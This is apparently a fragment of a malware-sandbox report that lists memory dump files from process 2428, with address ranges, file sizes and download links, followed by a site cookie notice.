    • memory/2428-171-0x00000000064A0000-0x00000000064BA000-memory.dmp

      Filesize

      104KB

      Download

    • memory/2428-169-0x0000000002990000-0x00000000029A0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2428-175-0x00000000081E0000-0x000000000885A000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/2428-167-0x0000000005F70000-0x0000000005F8E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/2428-178-0x0000000007470000-0x0000000007474000-memory.dmp

      Filesize

      16KB

      Download

    • memory/2428-166-0x0000000005970000-0x0000000005CC4000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/2428-191-0x0000000073A00000-0x00000000741B0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/2428-152-0x0000000002990000-0x00000000029A0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2428-156-0x0000000005900000-0x0000000005966000-memory.dmp

      Filesize

      408KB

      Download

    • memory/2428-155-0x0000000005890000-0x00000000058F6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/2428-154-0x0000000004F90000-0x0000000004FB2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2428-153-0x0000000005030000-0x0000000005658000-memory.dmp

      Filesize

      6.2MB

      Download

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.